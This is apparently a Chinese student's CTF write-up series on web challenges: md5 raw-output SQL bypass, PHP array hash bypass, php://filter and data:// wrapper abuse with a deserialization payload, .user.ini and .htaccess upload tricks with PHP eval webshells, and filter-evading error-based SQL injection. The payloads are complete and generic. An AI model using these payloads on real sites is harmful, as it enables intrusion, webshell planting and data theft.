<p>（1）md5(string,true)函数在指定了true的时候，是返回的原始 16 字符二进制格式。也就是说会返回这样子的字符串：’or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c  不是普通的二进制字符串，而是’or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c 这种。这样的话就会和前面的形成闭合，构成万能密码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">content: ffifdyop</span><br><span class="line"></span><br><span class="line">hex: <span class="number">276</span>f722736c95d99e921722cf9ed621c</span><br><span class="line"></span><br><span class="line">raw: <span class="string">&#x27;or&#x27;</span><span class="number">6</span>\xc9]\x99\xe9!r,\xf9\xedb\x1c</span><br><span class="line"></span><br><span class="line"><span class="keyword">string</span>: <span class="string">&#x27;or&#x27;</span><span class="number">6</span>]!r,b</span><br><span class="line"><span class="comment">//构成一个类似与万能密码的语句，得到永真的条件</span></span><br><span class="line">select * <span class="keyword">from</span> <span class="string">&#x27;admin&#x27;</span> where password=<span class="string">&#x27;&#x27;</span><span class="keyword">or</span><span class="string">&#x27;6.......&#x27;</span></span><br><span class="line"> <span class="comment">//为什么为真？</span></span><br><span class="line"><span class="comment">/*因为在mysql里面，在用作布尔型判断时，以1开头的字符串会被当做整型数（这类似于PHP的弱类型）。要注意的是这种情况是必须要有单引号括起来的，比如password=‘xxx’ or ‘1xxxxxxxxx’，那么就相当于password=‘xxx’ or 1 ，也就相当于password=‘xxx’ or true，所以返回值就是true。这里不只是1开头，只要是数字开头都是可以的。</span></span><br><span class="line"><span class="comment">当然如果只有数字的话，就不需要单引号，比如password=‘xxx’ or 1，那么返回值也是true。（xxx指代任意字符）</span></span><br><span class="line"><span class="comment">/*</span></span><br></pre></td></tr></table></figure>

<p>（2）输入ffifdyop后，过了第一关进入第二关，发现页面啥也没有，所以直接查看源代码。<img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316234335675.png" alt="image-20220316234335675"></p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316234508381.png" alt="image-20220316234508381"></p>
<p>看到一串php源码，分析可以知道的是典型的哈希碰撞，所以想办法绕过。</p>
<p>我们这里用php数组绕过，由于哈希函数无法处理php数组，在遇到数组时返回false，我们就可以利用false&#x3D;&#x3D;false成立使条件成立。</p>
<p>一、什么是哈希碰撞<br>所谓哈希（hash），就是将不同的输入映射成独一无二的、固定长度的值（又称”哈希值”）。它是最常见的软件运算之一。如果不同的输入得到了同一个哈希值，就发生了”哈希碰撞”（collision）。</p>
<p>二、哈希碰撞产生原理<br>举个例子，假设要将某些元素存放在长度length，则其中某一个元素的key值为k，则其哈希值hash的计算公式为：</p>
<p>hash &#x3D; (k)%length<br>假设length &#x3D; 16，那么两个不同元素的key值分别为12和28，那么他们所取得的hash值都等于12，这就造成冲突了。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//输入payload:?a[]=1&amp;b[]=2</span></span><br></pre></td></tr></table></figure>

<p>（3）可以看到我们又进入了下一关，分析源码依旧是哈希碰撞，不过换成post传参。</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316235510043.png" alt="image-20220316235510043"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//payload:?param1[]=1&amp;param2[]=2</span></span><br></pre></td></tr></table></figure>

<p>输入payload后直接获取到了flag。</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316235923228.png" alt="image-20220316235923228"></p>
<h2 id="ZJCTF-2019-NiZhuanSiWei"><a href="#ZJCTF-2019-NiZhuanSiWei" class="headerlink" title="[ZJCTF 2019]NiZhuanSiWei"></a>[ZJCTF 2019]NiZhuanSiWei</h2><p>进入首页直接来了一段源码，猜测要用到反序列化，可惜代码审计能力太差，看懂的并不多，所以看大佬博客进行分析。</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317000207148.png" alt="image-20220317000207148"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line"><span class="variable">$text</span> = <span class="variable">$_GET</span>[<span class="string">&quot;text&quot;</span>];</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">&quot;file&quot;</span>];</span><br><span class="line"><span class="variable">$password</span> = <span class="variable">$_GET</span>[<span class="string">&quot;password&quot;</span>];</span><br><span class="line"><span class="comment">//判断￥text变量存在且内容等于welcome to the zjctf</span></span><br><span class="line"><span class="comment">//(file_get_contents($text,&#x27;r&#x27;)读取$text中的内容</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$text</span>)&amp;&amp;(<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$text</span>,<span class="string">&#x27;r&#x27;</span>)===<span class="string">&quot;welcome to the zjctf&quot;</span>))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&lt;h1&gt;&quot;</span>.<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$text</span>,<span class="string">&#x27;r&#x27;</span>).<span class="string">&quot;&lt;/h1&gt;&lt;/br&gt;&quot;</span>;</span><br><span class="line">    <span class="comment">//输出$text内容</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/flag/&quot;</span>,<span class="variable">$file</span>))&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Not now!&quot;</span>;</span><br><span class="line">        <span class="keyword">exit</span>();</span><br><span class="line">    <span class="comment">//正则匹配flag，也就是过滤了flag</span></span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">include</span>(<span class="variable">$file</span>);  <span class="comment">//useless.php</span></span><br><span class="line">        <span class="variable">$password</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$password</span>);</span><br><span class="line">        <span class="comment">//$password进行了反序列化</span></span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$password</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="comment">/*php://filter</span></span><br><span class="line"><span class="comment">可以说这是最常使用的一个伪协议，一般可以利用进行任意文件读取。</span></span><br><span class="line"><span class="comment">用法</span></span><br><span class="line"><span class="comment">php://filter/read=convert.base64-encode/resource=[文件名]读取文件源码（针对php文件需要base64编码）</span></span><br><span class="line"><span class="comment">data:// 协议</span></span><br><span class="line"><span class="comment">通常可以用来执行PHP代码,也可以写入内容。</span></span><br><span class="line"><span class="comment">用法</span></span><br><span class="line"><span class="comment">data://text/plain</span></span><br><span class="line"><span class="comment">data://text/plain;base64,</span></span><br><span class="line"><span class="comment">/*</span></span><br></pre></td></tr></table></figure>

<p>可以看到第一个if要求$text中的内容等于welcome to the zjctf，又看到file_get_contents($text,’r’)这个函数，首先可以猜测$text可能是一个文件，但是由于不知道文件名，所以可以用data伪协议进行写入welcome to the zjctf，然后读取。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//payload:?text=data://text/plain,welcome to the zjctf</span></span><br></pre></td></tr></table></figure>

<p>输入payload可以看到回显正常，绕过了第一个if。然后第二个变量file，可以看到源码中有提示useless.php，因此我们可以直接php:&#x2F;&#x2F;filter协议进行包含文件读取内容。</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317004351448.png"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//payload:?text=data://text/plain,welcome to the zjctf&amp;file=php://filter/convert.base64-encode/resource=useless.php</span></span><br></pre></td></tr></table></figure>

<p>包含成功，进行base64解码<img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317004958983.png" alt="image-20220317004958983"></p>
<p>解码后获得一段源码，直接进行反序列化，构造payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Flag</span></span>&#123;  <span class="comment">//flag.php  </span></span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$file</span>;  </span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__tostring</span>(<span class="params"></span>)</span>&#123;  </span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable language_">$this</span>-&gt;file))&#123;  </span><br><span class="line">            <span class="keyword">echo</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$this</span>-&gt;file); </span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">        <span class="keyword">return</span> (<span class="string">&quot;U R SO CLOSE !///COME ON PLZ&quot;</span>);</span><br><span class="line">        &#125;  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="meta">?&gt;</span>  </span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317005045646.png" alt="image-20220317005045646"></p>
<p>序列化脚本</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Flag</span></span>&#123;  <span class="comment">//flag.php  </span></span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$file</span>=<span class="string">&quot;flag.php &quot;</span>;  </span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__tostring</span>(<span class="params"></span>)</span>&#123;  </span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable language_">$this</span>-&gt;file))&#123;  </span><br><span class="line">            <span class="keyword">echo</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$this</span>-&gt;file); </span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">        <span class="keyword">return</span> (<span class="string">&quot;U R SO CLOSE !///COME ON PLZ&quot;</span>);</span><br><span class="line">        &#125;  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;  </span><br><span class="line"></span><br><span class="line"><span class="variable">$a</span>=<span class="keyword">new</span> <span class="title class_">Flag</span>();</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>);</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span>  </span><br><span class="line">  </span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//获得payload：O:4:&quot;Flag&quot;:1:&#123;s:4:&quot;file&quot;;s:9:&quot;flag.php &quot;;&#125;</span></span><br><span class="line"><span class="comment">//最终payload:?text=data://text/plain,welcome to the zjctf&amp;file=useless.php&amp;password=O:4:&quot;Flag&quot;:1:&#123;s:4:&quot;file&quot;;s:8:&quot;flag.php&quot;;&#125;</span></span><br></pre></td></tr></table></figure>

<p>输入payload获得flag  <img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317011758179.png" alt="image-20220317011758179"></p>
<h2 id="SUCTF-2019-CheckIn"><a href="#SUCTF-2019-CheckIn" class="headerlink" title="[SUCTF 2019]CheckIn"></a>[SUCTF 2019]CheckIn</h2><p>进入界面，考虑到文件上传的题型，直接进行抓包。<img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317015120955.png" alt="image-20220317015120955"></p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317015333603.png" alt="image-20220317015333603"></p>
<p>尝试上传一句话木马php文件，发现php被过滤了，所以换成png试试。</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317015518520.png" alt="image-20220317015518520"></p>
<p>改完后缀，又发现&lt;?被过滤了，所以尝试换一个一句话木马上传。</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317015642645.png" alt="image-20220317015642645"></p>
<p>一句话木马改完后，又发现图片的文件头又不对，所以尝试加上GIF89a文件头上传</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317015830348.png" alt="image-20220317015830348"></p>
<p>可以发现上传成功，但是得读取文件拿到flag，工具分析网站用的是ngnix</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317021718680.png" alt="image-20220317021718680"></p>
<p>所以我们在尝试上传.user.ini文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*.user.ini内容为：</span></span><br><span class="line"><span class="comment">auto_prepend_file=filename(文件名)</span></span><br><span class="line"><span class="comment">.user.ini实际上就是一个可以由用户“自定义”的php.ini，我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。实际上，除了PHP_INI_SYSTEM以外的模式（包括PHP_INI_ALL）都是可以通过.user.ini来设置的。</span></span><br><span class="line"><span class="comment">.user.ini是一个能被动态加载的ini文件。也就是说我修改了.user.ini后，不需要重启服务器中间件，只需要等待user_ini.cache_ttl所设置的时间（默认为300秒），即可被重新加载。</span></span><br><span class="line"><span class="comment">我们可以很容易地借助.user.ini文件来构造一个“后门”。auto_append_file、auto_prepend_file</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">    </span></span><br><span class="line"><span class="comment"> 我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件，而这个文件可以是一个正常php文件，也可以是一个包含一句话的webshell。</span></span><br><span class="line"><span class="comment"> 一句话木马：</span></span><br><span class="line"><span class="comment"> &lt;?php <span class="doctag">@eval</span>($_POST[&#x27;shell&#x27;]);?&gt;</span></span><br><span class="line"><span class="comment">&lt;script language=&quot;php&quot;&gt;eval($_POST[1]);&lt;/script&gt;</span></span><br><span class="line"><span class="comment"> /*</span></span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317134648674.png![image-20220317145051125](C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317145051125.png![image-20220317145323444](C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317145323444.png" alt="image-20220317134648674"></p>
<p>上传成功，直接蚁剑链接index.php文件，webshell被执行，获取flag。<img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317145622095.png" alt="image-20220317145622095"></p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317145458072.png" alt="image-20220317145458072"></p>
<h2 id="极客大挑战-2019-HardSQL"><a href="#极客大挑战-2019-HardSQL" class="headerlink" title="[极客大挑战 2019]HardSQL"></a>[极客大挑战 2019]HardSQL</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">sql注入常规思路：</span><br><span class="line"></span><br><span class="line"><span class="number">1</span>、判断类型</span><br><span class="line"><span class="number">2</span>、万能密码 <span class="number">1</span><span class="string">&#x27; or 1=1 #</span></span><br><span class="line"><span class="string">3、判断字段数</span></span><br><span class="line"><span class="string">1&#x27;</span>order by <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span><span class="comment">#</span></span><br><span class="line"><span class="number">4</span>、回显点</span><br><span class="line"><span class="number">1</span><span class="string">&#x27; union select 1,2,3#</span></span><br><span class="line"><span class="string">5、爆数据库，版本</span></span><br><span class="line"><span class="string">1&#x27;</span> union select <span class="number">1</span>,<span class="title function_ invoke__">database</span>(),<span class="title function_ invoke__">version</span>()<span class="comment">#</span></span><br><span class="line"></span><br><span class="line"><span class="number">6</span>、爆表</span><br><span class="line"><span class="number">1</span><span class="string">&#x27; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#x27;</span><span class="string">&#x27;#</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">7、爆字段</span></span><br><span class="line"><span class="string">1&#x27;</span> union select <span class="number">1</span>,<span class="number">2</span>,<span class="title function_ invoke__">group_concat</span>(column_name) <span class="keyword">from</span> information_schema.columns where table_name=<span class="string">&#x27;&#x27;</span><span class="comment">#</span></span><br><span class="line"></span><br><span class="line"><span class="number">8</span>、爆数据</span><br><span class="line"><span class="number">1</span><span class="string">&#x27; union select 1,group_concat(id,username,password),3 from  #</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br></pre></td></tr></table></figure>

<p>先随便输入用户名，密码，显示正常。<img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317231219152.png" alt="image-20220317231219152"></p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317231240037.png" alt="image-20220317231240037"></p>
<p>1、判断类型，发现报错，说明是字符型注入。<img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317214823510.png" alt="image-20220317214823510"></p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317214933252.png" alt="image-20220317214933252"></p>
<p>2、万能密码尝试，发现一句话，应该是有过滤，不清楚过滤了些什么，手动测试了一些字母，发现测试不出来，所以尝试用关键字，爆破。查看到底过滤了些啥？</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317215121478.png" alt="image-20220317215121478"></p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317215133380.png" alt="image-20220317215133380"></p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317232303094.png" alt="image-20220317232303094"></p>
<p>发现很多关键字都被过滤了，包括union，所以联合查询注入就不考虑了。!<img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317233448553.png" alt="image-20220317233448553"></p>
<p>但是发现extractvalue，updatexml并没有被过滤，所以考虑可以使用报错注入。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*extractvalue()</span></span><br><span class="line"><span class="comment">extractvalue() :对XML文档进行查询的函数</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">语法：extractvalue(目标xml文档，xml路径)</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">第一个参数 :   第一个参数可以传入目标xml文档</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">第二个参数： xml中的位置是可操作的地方，xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式，如果我们写入其他格式，就会报错，并且会返回我们写入的非法格式内容，而这个非法的内容就是我们想要查询的内容。</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">正常查询 第二个参数的位置格式 为 /xxx/xx/xx/xx ,即使查询不到也不会报错</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">tip: 还有要注意的地方是，它能够查询的字符串长度最大是32个字符，如果超过32位，我们就需要用函数来查询，比如right(),left()，substr()来截取字符串</span></span><br><span class="line"><span class="comment">报错注入常用函数：</span></span><br><span class="line"><span class="comment">extractvalue(1,concat(07xe,执行语句))</span></span><br><span class="line"><span class="comment">updatexml(1,concat(07xe,执行语句),1)</span></span><br><span class="line"><span class="comment">/*</span></span><br></pre></td></tr></table></figure>

<p>其中，还过滤了<code>空格</code>、<code>=</code>、<code>substring</code>、<code>mid</code>等字符</p>
<ul>
<li>使用<code>()</code>代替空格</li>
<li>使用<code>like</code>代替<code>=</code></li>
<li>使用<code>right</code>、<code>left</code>代替<code>substring</code>、<code>mid</code></li>
</ul>
<p>注入过程：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">方法一：</span><br><span class="line"><span class="number">1</span><span class="string">&#x27;or(1)like(2)#</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">1&#x27;</span><span class="keyword">or</span>(<span class="title function_ invoke__">updatexml</span>(<span class="string">&#x27;~&#x27;</span>,<span class="title function_ invoke__">concat</span>(<span class="string">&#x27;~&#x27;</span>,<span class="title function_ invoke__">database</span>(),<span class="string">&#x27;~&#x27;</span>),<span class="string">&#x27;~&#x27;</span>))<span class="comment">#</span></span><br><span class="line"></span><br><span class="line"><span class="number">1</span><span class="string">&#x27;or(updatexml(&#x27;</span>~<span class="string">&#x27;,concat(&#x27;</span>~<span class="string">&#x27;,(select(left(group_concat(schema_name),30))from(information_schema.schemata)),&#x27;</span>~<span class="string">&#x27;),&#x27;</span>~<span class="string">&#x27;))#</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">1&#x27;</span><span class="keyword">or</span>(<span class="title function_ invoke__">updatexml</span>(<span class="string">&#x27;~&#x27;</span>,<span class="title function_ invoke__">concat</span>(<span class="string">&#x27;~&#x27;</span>,(<span class="title function_ invoke__">select</span>(<span class="title function_ invoke__">right</span>(<span class="title function_ invoke__">group_concat</span>(schema_name),<span class="number">30</span>))<span class="keyword">from</span>(information_schema.schemata)),<span class="string">&#x27;~&#x27;</span>),<span class="string">&#x27;~&#x27;</span>))<span class="comment">#</span></span><br><span class="line"></span><br><span class="line"><span class="number">1</span><span class="string">&#x27;or(updatexml(&#x27;</span>~<span class="string">&#x27;,concat(&#x27;</span>~<span class="string">&#x27;,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like&#x27;</span>geek<span class="string">&#x27;),&#x27;</span>~<span class="string">&#x27;),&#x27;</span>~<span class="string">&#x27;))#</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">1&#x27;</span><span class="keyword">or</span>(<span class="title function_ invoke__">updatexml</span>(<span class="string">&#x27;~&#x27;</span>,<span class="title function_ invoke__">concat</span>(<span class="string">&#x27;~&#x27;</span>,(<span class="title function_ invoke__">select</span>(<span class="title function_ invoke__">group_concat</span>(id,<span class="string">&#x27;~&#x27;</span>,username,<span class="string">&#x27;~&#x27;</span>,password))<span class="keyword">from</span>(geek.H4rDsq1)),<span class="string">&#x27;~&#x27;</span>),<span class="string">&#x27;~&#x27;</span>))<span class="comment">#</span></span><br><span class="line"></span><br><span class="line"><span class="number">1</span><span class="string">&#x27;or(updatexml(&#x27;</span>~<span class="string">&#x27;,concat(&#x27;</span>~<span class="string">&#x27;,(select(right(group_concat(id,&#x27;</span>~<span class="string">&#x27;,username,&#x27;</span>~<span class="string">&#x27;,password),30))from(geek.H4rDsq1)),&#x27;</span>~<span class="string">&#x27;),&#x27;</span>~<span class="string">&#x27;))#</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">方法二：</span></span><br><span class="line"><span class="string">爆库名：1&#x27;</span><span class="keyword">or</span>(<span class="title function_ invoke__">extractvalue</span>(<span class="number">1</span>,<span class="title function_ invoke__">concat</span>(<span class="number">0x7e</span>,<span class="title function_ invoke__">database</span>(),<span class="number">0x7e</span>)))<span class="comment">#  ~geek~</span></span><br><span class="line">爆表名：<span class="number">1</span><span class="string">&#x27;or(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))),0x7e)))#   ~H4rDsq1~</span></span><br><span class="line"><span class="string">爆列名：1&#x27;</span><span class="keyword">or</span>(<span class="title function_ invoke__">extractvalue</span>(<span class="number">1</span>,<span class="title function_ invoke__">concat</span>(<span class="number">0x7e</span>,(<span class="title function_ invoke__">select</span>(<span class="title function_ invoke__">group_concat</span>(column_name))<span class="keyword">from</span>(information_schema.columns)<span class="title function_ invoke__">where</span>((table_name)<span class="title function_ invoke__">like</span>(<span class="string">&#x27;H4rDsq1&#x27;</span>))),<span class="number">0x7e</span>)))<span class="comment">#  ~id,username,password~</span></span><br><span class="line">爆数据：<span class="number">1</span><span class="string">&#x27;or(extractvalue(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e)))#      </span></span><br><span class="line"><span class="string">1&#x27;</span><span class="keyword">or</span>(<span class="title function_ invoke__">extractvalue</span>(<span class="number">1</span>,<span class="title function_ invoke__">concat</span>(<span class="number">0x7e</span>,(<span class="title function_ invoke__">select</span>(<span class="title function_ invoke__">group_concat</span>(<span class="title function_ invoke__">right</span>(password,<span class="number">30</span>)))<span class="keyword">from</span>(H4rDsq1)),<span class="number">0x7e</span>)))<span class="comment"># </span></span><br><span class="line">两次对比：   ~<span class="number">1</span>flagflag&#123;<span class="number">78</span>c49835-b10c-<span class="number">4</span>be4-<span class="number">86</span>    ~<span class="number">5</span>-b10c-<span class="number">4</span>be4-<span class="number">86</span>ea-<span class="number">9</span>b8876e38f12&#125;~</span><br><span class="line">拼接获得最后flag：flag&#123;<span class="number">78</span>c49835-b10c-<span class="number">4</span>be4-<span class="number">86</span>ea-<span class="number">9</span>b8876e38f12&#125;</span><br></pre></td></tr></table></figure>

<h2 id="MRCTF2020-你传你🐎呢"><a href="#MRCTF2020-你传你🐎呢" class="headerlink" title="[MRCTF2020]你传你🐎呢"></a>[MRCTF2020]你传你🐎呢</h2><p>进入界面直接抓包上传php文件，发现不可以，在进行上传jpg图片，发现可以。</p>
<p>在这里，我上传了.png，但是服务器是不会把jpg当作php脚本来解析的，需要有别的文件辅助，目前我学到的是有两种方法：1.上传.user.ini文件，此前提是上传目录中已有php文件。2.上传.htaccess文件。</p>
<p>这里目录，似乎没有php文件，所以尝试第二种。上传.htaccess文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">.htaccess文件内容</span><br><span class="line">&lt;FilesMatch <span class="string">&quot;1.png&quot;</span>&gt;</span><br><span class="line">SetHandler application/x-httpd-php</span><br><span class="line">&lt;/FilesMatch&gt;</span><br></pre></td></tr></table></figure>

